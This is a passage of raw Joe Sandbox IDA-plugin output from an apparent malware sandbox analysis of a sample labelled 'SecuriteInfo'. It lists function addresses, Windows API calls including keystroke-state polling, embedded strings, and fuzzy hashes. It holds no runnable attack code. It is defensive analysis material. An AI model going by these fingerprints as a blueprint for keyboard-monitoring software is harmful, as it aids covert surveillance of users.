Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: %s1$0x%06X$0x%08X$GetLayeredWindowAttributes$Parameter #2 invalid.$user32
API String ID: 0-141734719
Opcode ID: 2515a2686967428dc7edf63fdae7670d2c5326699b30cd507d7972e02d661f49
Instruction ID: 401ca4bb26677770db58a58842f543f34fa643e0978ae781628a3b860c4482a6
Opcode Fuzzy Hash: 2515a2686967428dc7edf63fdae7670d2c5326699b30cd507d7972e02d661f49
Instruction Fuzzy Hash: F3D158727083056BD720DA69AC81FABB7D99BD8314F14452FF944873C2DE79DC4483AA

Function 004232C0 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 406COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 00423319
_memmove.LIBCMT ref: 004234D0
_memmove.LIBCMT ref: 0042365F
_memmove.LIBCMT ref: 00423777

Strings

Out of memory., xrefs: 004235E8
ErrorLevel, xrefs: 00423363
Illegal parameter name., xrefs: 004233A8
", xrefs: 004233F2
Variable name too long., xrefs: 004232FB

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memmove$_strncpy
String ID: "$ErrorLevel$Illegal parameter name.$Out of memory.$Variable name too long.
API String ID: 119253716-3900197193
Opcode ID: dade68ac0ef350f7adb8d1f36820b0ff37fcf8aa422573be444333100ff2633e
Instruction ID: 65c1d6af615c33d67ecadd584d18c98bd8b31f4badaeb3e81bc1e8fe18af7c6b
Opcode Fuzzy Hash: dade68ac0ef350f7adb8d1f36820b0ff37fcf8aa422573be444333100ff2633e
Instruction Fuzzy Hash: 22E1D1716042119FC720DF18E880AABB7F4EF88319F54466EE88997341D73DEA46CB96

Function 0045DC50 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 339COMMON

Download Yara Rule

Strings

%sW, xrefs: 0045DEF7
%sX, xrefs: 0045DE25
%sH, xrefs: 0045DF5F
%sY, xrefs: 0045DE8E

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoui64
String ID: %sH$%sW$%sX$%sY
API String ID: 3882282163-2562685033
Opcode ID: 1b4013a8bece0b277f5fa54329425164b1e3a6a105abf77b03d24eaa31d88f38
Instruction ID: 7498a03742e49d11f29e330b1c5be0776ec04f6812b621786b6b55cd0b4aeb83
Opcode Fuzzy Hash: 1b4013a8bece0b277f5fa54329425164b1e3a6a105abf77b03d24eaa31d88f38
Instruction Fuzzy Hash: 1FC12271604300ABD314DF55DC81F6B77A9EB88714F004A2EF9458B392C778EC49CBAA

Function 0045E660 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 227COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 0045E681

Strings

ContextMenu, xrefs: 0045E806
DropFiles, xrefs: 0045E872
Size, xrefs: 0045E7A3
Escape, xrefs: 0045E735
%sGui, xrefs: 0045E6AD
Close, xrefs: 0045E6CB
Gui, xrefs: 0045E6BB

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: %sGui$Close$ContextMenu$DropFiles$Escape$Gui$Size
API String ID: 2961919466-1013300650
Opcode ID: a2d8afca8af2dde8e2cedfc16467b04cd08ceefd2fe8ceb494ad4a117cc81112
Instruction ID: edf014e5240fb5c2d713ae4f915af7a0c63df7add7927ffe7d615a7f0d70490f
Opcode Fuzzy Hash: a2d8afca8af2dde8e2cedfc16467b04cd08ceefd2fe8ceb494ad4a117cc81112
Instruction Fuzzy Hash: 2A811671904311ABD728DF26D800797BBE4AF59711F05896EEC4497352E378EE08CBAA

Function 00430920 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 165COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 004309E0

Strings

yes, xrefs: 00430A4C, 00430A5E, 00430AB0, 00430AB1
..., xrefs: 004309DA
Key History has been disabled via #KeyHistory 0., xrefs: 00430B09, 00430B10
, xrefs: 004309ED
%s , xrefs: 00430993
Window: %sKeybd hook: %sMouse hook: %sEnabled Timers: %u of %u (%s)Interrupted threads: %d%sPaused threads: %d of %d (%d layers)Modifiers (GetKeyState() now) = %s, xrefs: 00430ABA
Press [F5] to refresh., xrefs: 00430B02
Object, xrefs: 0043097F, 00430992

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: Key History has been disabled via #KeyHistory 0.$Press [F5] to refresh.$ $%s $...$Object$Window: %sKeybd hook: %sMouse hook: %sEnabled Timers: %u of %u (%s)Interrupted threads: %d%sPaused threads: %d of %d (%d layers)Modifiers (GetKeyState() now) = %s$yes
API String ID: 2961919466-736972282
Opcode ID: 2a9d916306591f79da599c0468a428c3f50f3341f9e2f6896d7b96e469ae0392
Instruction ID: cd9b67eae9a3dc484accd87ea280f0cffc81a131c98de041b2e32069462377de
Opcode Fuzzy Hash: 2a9d916306591f79da599c0468a428c3f50f3341f9e2f6896d7b96e469ae0392
Instruction Fuzzy Hash: F251D4B29043459FEB20DF14E895A677FE4AF99304F08463EE4C987302D329AD4CC79A

Function 00434FF0 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 136COMMON

Download Yara Rule

Strings

Timeout, xrefs: 00435015
sc%03X, xrefs: 00435144
NewInput, xrefs: 004351A1
EndKey, xrefs: 0043517D
Max, xrefs: 0043518F
EndKey:, xrefs: 00435054
Stopped, xrefs: 004351B3
Match, xrefs: 00435027

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: EndKey$EndKey:$Match$Max$NewInput$Stopped$Timeout$sc%03X
API String ID: 0-3482771585
Opcode ID: b412f0fa2a6622836c612dd705ccb45e58df44b4c3b7c642065a9f9b5b9873cb
Instruction ID: 45c970c58f987d3918c7dac8620d565b6a73ed470286ee6024c0e0b8ea795276
Opcode Fuzzy Hash: b412f0fa2a6622836c612dd705ccb45e58df44b4c3b7c642065a9f9b5b9873cb
Instruction Fuzzy Hash: D2415F32B447805BEB31871CA8417F7BB90C79A324F08447FDAC446382D26F5899C3AA

Function 00410B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

@, xrefs: 00410BDB

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 90b7046861cc49ad1152ec170b00aeea79013102205272c7c2a707bb3d4b2d0c
Instruction ID: 1d34433753557f87c468c368f7188d6c5c04a5dfc32c1be8e2a0b4f01f1a35cd
Opcode Fuzzy Hash: 90b7046861cc49ad1152ec170b00aeea79013102205272c7c2a707bb3d4b2d0c
Instruction Fuzzy Hash: E141593424C3C465F72493A98C427E7AF905F92304F58806AF6D44B2D2E6E894C9EB6F

Function 00443445 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 0044345C

Strings

%03d, xrefs: 00443456
%02d, xrefs: 004435CA, 0044361B, 00443652, 0044366D

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _sprintf
String ID: %02d$%03d
API String ID: 1467051239-1045006881
Opcode ID: 7df1c55e3a501c80e0e368a4d7f6a62270d81a6a0f3990ffcd4816523352d1c5
Instruction ID: e4167e5bebd0ec922ec9287403e7266a329717b0b1f532980aafd196e08a62c4
Opcode Fuzzy Hash: 7df1c55e3a501c80e0e368a4d7f6a62270d81a6a0f3990ffcd4816523352d1c5
Instruction Fuzzy Hash: 7131FCA7B4512428F51037AA7C027BFB358DA91B37F98413BFE4CC06E2E51D5A54836C

Function 00413430 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32(000000A0), ref: 00413459
GetAsyncKeyState.USER32(000000A1), ref: 0041346F
GetAsyncKeyState.USER32(000000A2), ref: 00413485
GetAsyncKeyState.USER32(000000A3), ref: 0041349B
GetAsyncKeyState.USER32(000000A4), ref: 004134B1
GetAsyncKeyState.USER32(000000A5), ref: 004134C7
GetAsyncKeyState.USER32(0000005B), ref: 004134DA
GetAsyncKeyState.USER32(0000005C), ref: 004134ED

Strings

@, xrefs: 004134E6

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AsyncState
String ID: @
API String ID: 425341421-2766056989
Opcode ID: 819d279846d2e9c11530e7abe700d65f6f95e3cf906010616791a61477446e8e
Instruction ID: c36fae33e1c8bef5acdc3e620ea12a1e1f088d8efa493b9d11528c3557cc0199
Opcode Fuzzy Hash: 819d279846d2e9c11530e7abe700d65f6f95e3cf906010616791a61477446e8e
Instruction Fuzzy Hash: 743109752183C425F7128739D8103EB6FE56B47765F1CC0AFA6D41B2D1CAAC8988DB2B

Function 0044CA90 Relevance: 15.3, APIs: 10, Instructions: 278windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0044CBBC
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0044CC1C
SendMessageA.USER32(?), ref: 0044CC4A
SendMessageA.USER32(00000000,00000414,00000001,00000000), ref: 0044CC63
DestroyCursor.USER32(00000000), ref: 0044CC6A
SendMessageA.USER32(?,00000404,00000001,?), ref: 0044CC87

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$CursorDestroy
String ID:
API String ID: 1839592766-0
Opcode ID: 9a96fcbb01de89941a9676cbb383b215a32f266123e8f0a9943a470f6f4b1a8d
Instruction ID: 3e0a0862830f89e0715732dc33ec864f4ae3190fd8333df76529e18b0c1aa27b
Opcode Fuzzy Hash: 9a96fcbb01de89941a9676cbb383b215a32f266123e8f0a9943a470f6f4b1a8d
Instruction Fuzzy Hash: 4491F0B16053059BE710DF29D8C1B2BB7E5EB88304F08453EF94897392D635EC06CBAA

Function 0045E1A0 Relevance: 15.2, APIs: 10, Instructions: 189windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000406,00000000,00000000), ref: 0045E1F3
SendMessageA.USER32(?,00000414,00000000,00000000), ref: 0045E20C
DestroyCursor.USER32(00000000), ref: 0045E213
DeleteObject.GDI32(?), ref: 0045E29F
DeleteObject.GDI32(?), ref: 0045E2B3
DestroyCursor.USER32(?), ref: 0045E2FB
DestroyCursor.USER32(?), ref: 0045E37A
DestroyCursor.USER32(?), ref: 0045E381
DestroyAcceleratorTable.USER32(?), ref: 0045E38B

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Destroy$Cursor$DeleteMessageObjectSend$AcceleratorTable
String ID:
API String ID: 3974317915-0
Opcode ID: 2e13420d229915573a9520f2079fb140d6e269b11b9dd67a0e755bee41760de2
Instruction ID: 8445dec73d425af4f6420daff365701a1c1cf6b5da7f94c51bdb494f2674fbf8
Opcode Fuzzy Hash: 2e13420d229915573a9520f2079fb140d6e269b11b9dd67a0e755bee41760de2
Instruction Fuzzy Hash: CF51CF71600205DBDB28DF66DC84A6B77A9BB44302F14486AFC16D7346D739EE09CB98

Function 00464C70 Relevance: 15.1, APIs: 10, Instructions: 138windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000172,00000002,00000000), ref: 00464CC0
DestroyCursor.USER32(00000000), ref: 00464CC3
SendMessageA.USER32(?,00000172,00000000,00000000), ref: 00464CD5
DeleteObject.GDI32(00000000), ref: 00464CD8
DestroyCursor.USER32(00000000), ref: 00464D12
GetWindowLongA.USER32(?,000000F0), ref: 00464D22
SendMessageA.USER32(?,00000172,?,00000000), ref: 00464D65
SendMessageA.USER32(00000000,00000173,?,00000000), ref: 00464D72
DeleteObject.GDI32(00000000), ref: 00464D86
DestroyCursor.USER32(00000000), ref: 00464D8E

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$CursorDestroy$DeleteObject$LongWindow
String ID:
API String ID: 3547345136-0
Opcode ID: 01edb0310690cb848baf8f20e44e17943f0c8ad8685870579504436c547e3527
Instruction ID: 258d17b9ac413daab80560c72bc2a6894c74b66d46e5df7847d9522f22736d07
Opcode Fuzzy Hash: 01edb0310690cb848baf8f20e44e17943f0c8ad8685870579504436c547e3527
Instruction Fuzzy Hash: 4941C3715087046BD7348B68DC44F27B7E9EFD4324F204A1EF5A6863C0EB78EC019A29

Function 00468820 Relevance: 15.1, APIs: 10, Instructions: 111windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000407,00000000,?), ref: 00468841
SendMessageA.USER32(00000000,00000408,00000001,?), ref: 00468851
SendMessageA.USER32(00000001,00000402,00000000,00000000), ref: 00468899
SendMessageA.USER32(?,00000408,00000001,00000000), ref: 004688A6
SendMessageA.USER32(?,00000417,00000000,00000000), ref: 004688BA
SendMessageA.USER32(?,00000415,00000000,?), ref: 004688CE
SendMessageA.USER32(?,0000041B,?,00000000), ref: 004688E2
SendMessageA.USER32(?,0000041F,?,00000000), ref: 004688F7
SendMessageA.USER32(?,00000420,00000001,?), ref: 0046890D
SendMessageA.USER32(?,00000420,00000000), ref: 00468923

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1e264df82118de81127911d087c2d855ed5a7da64794b4a5dc9519a51310240f
Instruction ID: d21d2381c055913c8201fc0a9e56caeeebfbe6ee71b97a481a68327034970617
Opcode Fuzzy Hash: 1e264df82118de81127911d087c2d855ed5a7da64794b4a5dc9519a51310240f
Instruction Fuzzy Hash: B231CEB07403447AE724EE69CC85F66739DAF84B00F54455EBB40EF2D6DAA4EC418B29

Function 0043BC30 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 411COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0043BCF8
GetWindowRect.USER32(00000000,?), ref: 0043BD84

Strings

user32.dll, xrefs: 0043C0FD

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: RectWindow
String ID: user32.dll
API String ID: 861336768-38312619
Opcode ID: c6231aa68940e1718a025c01f4b8456ab8707eb5af7c8ca1bbae9479523986c2
Instruction ID: 956e68d4ed91b3605902d2470a4e5e6be9d5bee435d43f821137f7b240da8b53
Opcode Fuzzy Hash: c6231aa68940e1718a025c01f4b8456ab8707eb5af7c8ca1bbae9479523986c2
Instruction Fuzzy Hash: 51D18B716043019FD714DB28DC85B6BB7E9EB88314F044A2EF989E7291D738ED058BA9

Function 00469E10 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00469E50
SendMessageA.USER32(?,00001005,00000000,?), ref: 00469EF5
__wcstoi64.LIBCMT ref: 00469F0F
SendMessageA.USER32(?,00001006,00000000,?), ref: 00469F4E
SendMessageA.USER32(00000001,00001030,?,00469C60), ref: 0046A088

Strings

shlwapi, xrefs: 00469F8F

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$__wcstoi64
String ID: shlwapi
API String ID: 1460428009-1545968523
Opcode ID: 3716413fa1b6efbd3417d7bd20937572001a2062468f3facba42afb031332385
Instruction ID: 84fcbcecd82e77801f031a2b6d150543dd97bc4050a938f775fab4d0382d3d0a
Opcode Fuzzy Hash: 3716413fa1b6efbd3417d7bd20937572001a2062468f3facba42afb031332385
Instruction Fuzzy Hash: D8617EB0508384AFD720DF65C880B5BBBE8AB85304F14481EF6C997281E7BA9845CF5B

